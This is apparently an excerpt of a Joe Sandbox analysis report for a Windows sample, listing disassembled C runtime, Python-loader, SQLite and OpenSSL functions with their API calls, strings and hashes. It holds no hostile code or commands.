Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 4fd1f0c6bb6e1feb03afd2ae079dcc5f2a362c457a86b5d1be680f9e0324aeb2
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 12218161F1866291FE209B28EC513BE6256BF88394F8442B2EF5EC65E5FE2DE505C700

Function 00007FF6BA3BBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BBE89

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction ID: 498042b8bade30e16a632e5d5190c2e48e6397d1dbcd995b40cfaaf51afd2612
Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction Fuzzy Hash: 83C1BE22A0CF8692EA609F1995402BD7B96FB81B80FD543B5EF4EC7791CE7CE8458700

Function 00007FF6BA3A6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6BA3A63C7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6BA3A6407
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6BA3A6456
Failed to load Python DLL '%ls'., xrefs: 00007FF6BA3A64A7
ucrtbase.dll, xrefs: 00007FF6BA3A63DD
LoadLibrary, xrefs: 00007FF6BA3A64AE

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: d4ae6c1f5732abe56ea102d3ee9fa16a361613dadb982520e3734562492fd192
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: BB41A131A18AA691EF10DB69E8551ED6316FF44384F800172EF5CC36A6EF3CE645C340

Function 00007FFDFB0CFFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFDFB0D020A

Strings

exclusive, xrefs: 00007FFDFB0D019B
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB0D02E6
psow, xrefs: 00007FFDFB0D0581
winOpen, xrefs: 00007FFDFB0D047D

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
Instruction ID: 52af07bafc975a2644948bd790a1591550986678943a7f048196efe7e0a4722e
Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
Instruction Fuzzy Hash: D9027021B0F64386FB548B21A874B7967A0FF8AB54F444235ED6E826F8DF3CE8459704

Function 00007FFDFB0CD9E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0CDA23
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0CDA4C
ReadFile.KERNEL32 ref: 00007FFDFB0CDA9F

Strings

winRead, xrefs: 00007FFDFB0CDAF7
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB0CDB38

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 1751861923-1843600136
Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
Instruction ID: b402aa12c8d4e1e184b1cc096676894ef4e25ce40fa06763d8201f04155c7833
Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
Instruction Fuzzy Hash: 7E412262B0968382E7108F15A8509B97BA5FB84784F404232EA6D836FCDF3CE5429340

Function 00007FF6BA3B5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5655
CreateFileW.KERNEL32 ref: 00007FF6BA3B5694
CloseHandle.KERNEL32 ref: 00007FF6BA3B56C9

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: 3bcf7c6ed53aca5c20e386785a37e803a8de415a3a2e6e4b6f39c6d92f09cd9e
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 16419F22E18B8283E7509B2895103697261FB947A4F509375EF9DC3AD2EF7CA5E08700

Function 00007FFDFAAB14F1 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 231COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAAF7D72

Strings

ssl3_read_n, xrefs: 00007FFDFAAF7C0A, 00007FFDFAAF7D12, 00007FFDFAAF7E31, 00007FFDFAAF7E9A
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDFAAF7C16, 00007FFDFAAF7D1E, 00007FFDFAAF7E3D, 00007FFDFAAF7EA6

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction ID: 860c721c02d510f97b093061ed71e03b6993c9e32b1db845b0e59148b57f3ed7
Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction Fuzzy Hash: 37A16C25B0878641FB5DAF25D820BB937A0EF44B88F944176DE6D0BACDDF38D44A8310

Function 00007FFDFAAB14BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAB0F1C3

Strings

state_machine, xrefs: 00007FFDFAB0F2AE, 00007FFDFAB0F450, 00007FFDFAB0F483
..\s\ssl\statem\statem.c, xrefs: 00007FFDFAB0F2B5, 00007FFDFAB0F45C, 00007FFDFAB0F48F

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction ID: 01c715055451c529d7dbb4d8584f5d5cf3f2acd84d0af4d2c8423743d1ca06b0
Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction Fuzzy Hash: F7A18321B0C65385FB6DAA35D461BBD2290FF41B45F9C80B2DD2D466DECE3CE8428361

Function 00007FFDFAAB127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAAF8AC5

Strings

ssl3_write_pending, xrefs: 00007FFDFAAF8B62, 00007FFDFAAF8BBE
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDFAAF8B6E, 00007FFDFAAF8BCA

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: eaf5885d02131ec018303b88a7a8661bae068e1f56a4a0ffa57ed54c9d29dd1e
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: 3A419F62B09B8282EB6C9F15D464BBD3390FB48B84F5441B6DA6C07BD9DF3DE4569300

Function 00007FF6BA3ACC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3ACE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6BA3ACE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6BA3ACC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6BA3ACCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6BA3ACD21

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 335ff39f3f99ffed34338f133bd4613ad11c62b4299f03c747fc64c91a1b93d7
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: B0313B21E0C66785FE54ABADD4623BD67839F41384F4845B4EF0ECB2E3DE6CA8058350

Function 00007FF6BA3B013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0277

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 8a0beec4657a7815b19838cc710d74aa1cf712b9ed1eef60bf7f5b2b335f6cec
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: F5513721B09B41A6FB289E2D948467A6293BF46BA4F884770EF7DC77D5CE3CE5008700

Function 00007FF6BA3BC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6BA3BC2CD), ref: 00007FF6BA3BC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6BA3BC2CD), ref: 00007FF6BA3BC18A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: 2e12372404bb75e630f27f2dcab915c789a23ffa6ebb811527d2b191df68c771
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 66110162708B9181DA208B29A804169A362AB49FF4F984371EFBDCB7E9CF7CD4518700

Function 00007FF6BA3BAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABC6
GetLastError.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABD0

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: c4c863d9a9f2aa53c30544939d376d09e66ce796af34c7608f5e543c0549db74
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 68219321F18E8283FEA49769949537D16839F887A4FC843B9DF2EC77D2DE6CA4854300

Function 00007FF6BA3BBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BBED4

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 2d5e62faf8d087b7a2871d42b9125e7fedfc88b4f3c558eacc28176e6673b9ec
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: A641C132919A4587EA349F2DA64127977A2EB55B81F900372EF8EC37D1CF6CE402CB51

Function 00007FF6BA3A7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6BA3A803A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
Instruction ID: 5b03a73843d6e72cb3d511d342e393f99775f96de53e1b95dd61511d0c8ca11b
Opcode Fuzzy Hash: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
Instruction Fuzzy Hash: 0221A321B18A6256FE50DA2AA9043BEE652BF45BC4F8844B0EF0DC7786DE7DE046C300

Function 00007FF6BA3BB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BB9C2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: 561f36ce20f8d9876c061068123aba0c8bd1c0d51e69060b0fd72c9c26a91bd8
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: 22315E32A18E1285EA516F5D884137C3A92AF84B94FC103B5EF5DC73D2CEBCA4418715

Function 00007FF6BA3B5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5EF9

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
